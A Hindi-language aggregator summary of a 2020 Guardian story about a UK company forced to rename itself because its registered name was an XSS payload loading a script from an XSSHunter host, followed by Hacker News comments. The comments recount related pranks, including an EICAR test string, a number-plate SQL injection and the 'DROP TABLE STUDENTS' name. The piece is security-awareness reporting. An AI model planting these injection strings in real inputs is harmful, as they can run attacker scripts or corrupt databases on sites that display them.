“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” को कंपनी का नाम बदलने के लिए मजबूर किया गया (2020)

 (theguardian.com)
2 पॉइंट द्वारा GN⁺ 2024-10-26 | 1 टिप्पणियां | WhatsApp पर शेयर करें

  • कंपनी का नाम बदलने के लिए मजबूर किया गया

    • Companies House ने security risk का हवाला देते हुए कंपनी का नाम बदलने के लिए मजबूर किया
    • मूल नाम “><SCRIPT SRC=HTTPS://MJT.XSS.HT>; LTD" था, और यह cross-site scripting (XSS) attack के प्रति vulnerable नाम था
    • XSSHunter साइट से script लोड करके alert message दिखाने के तरीके से security vulnerability को साबित किया गया

  • नाम बदलने की पृष्ठभूमि

    • ब्रिटेन के एक software engineer ने मज़ाकिया और शरारती नाम के साथ कंपनी स्थापित की
    • Companies House ने समझा कि यह नाम security risk पैदा कर सकता है और नाम बदलने की मांग की
    • पहले भी इसी तरह के नाम रजिस्टर हुए थे, लेकिन यह मामला पहली बार था जिसने कार्रवाई को उकसाया

  • सुरक्षा उपाय

    • Companies House ने security risk कम करने के लिए तुरंत कदम उठाए और ऐसे समान मामलों को रोकने के लिए preventive measures तैयार किए
    • कंपनी का नाम अब THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD कर दिया गया है

  • कंपनी निदेशक का पक्ष

    • कंपनी निदेशक ने सोचा था कि Government Digital Service (GDS) की security के मामले में अच्छी प्रतिष्ठा है, इसलिए कोई समस्या नहीं होगी
    • समस्या का पता चलते ही उन्होंने तुरंत Companies House और National Cyber Security Centre से संपर्क किया

GN⁺ की संक्षिप्त टिप्पणी

  • यह लेख बताता है कि अगर कंपनी के नाम में HTML code शामिल हो, तो किस तरह के security risk पैदा हो सकते हैं
  • यह cross-site scripting (XSS) जैसी security vulnerabilities के प्रति जागरूकता बढ़ाता है
  • इसी तरह के उद्देश्य वाले इंडस्ट्री प्रोजेक्ट्स में OWASP की security guidelines की सिफारिश की जा सकती है
  • यह लेख security awareness बढ़ाता है और कंपनी नाम रजिस्ट्रेशन के समय security considerations के महत्व पर ज़ोर देता है

संबंधित पढ़ाई

1 टिप्पणियां

 
GN⁺ 2024-10-26
Hacker News राय

  • एक उपयोगकर्ता ने पार्किंग टर्मिनल में Windows operating system और antivirus software के दुरुपयोग का मामला साझा किया। उसने QR code में EICAR test string encode करके scanner में डाला, जिससे antivirus popup ने टर्मिनल की स्क्रीन ढक दी और वह उपयोग के लायक नहीं रहा

  • यह ऐसी बेहतरीन trolling का मामला था जिसके कारण कानून बदलना पड़ा; कानून में संशोधन किया गया ताकि कंपनी के नाम में computer code शामिल न किया जा सके

  • 2014 में पोलैंड के एक ड्राइवर ने speed camera से बचने के लिए अपनी number plate में SQL injection जोड़ दिया था

  • एक कंपनी ने HTML script tag शामिल वाला नाम इस्तेमाल किया था, लेकिन बाद में उसे कानूनी रूप से अपना नाम बदलना पड़ा

  • संस्थापक का नाम "ROBERT'); DROP TABLE STUDENTS;" था, जो मशहूर Little Bobby Tables मामले की याद दिलाता है

  • किसी ने लगभग 2000 के आसपास Coke Auction में script का इस्तेमाल करके नीलामी में दूसरों को bid करने से रोकने का अपना अनुभव साझा किया। उसे कई चीजें मिल गईं, लेकिन आखिरकार उसका account हटा दिया गया और Coke UK से चेतावनी मिली

  • यह समस्या उठाई गई कि RSS feed में title element HTML है या plain text, यह स्पष्ट नहीं होता। Atom स्पष्ट रूप से निर्दिष्ट करता है कि title element को plain text के रूप में संभाला जाए

  • यह भी उल्लेख किया गया कि एक कंपनी ऐसे characters के साथ registered थी जो security risk पैदा कर सकते थे, हालांकि Companies House स्वयं प्रभावित नहीं हुआ, और संभव है कि कुछ ग्राहकों की security कमजोर रही हो

  • 2020 के लेख में संबंधित मामला शामिल किया गया था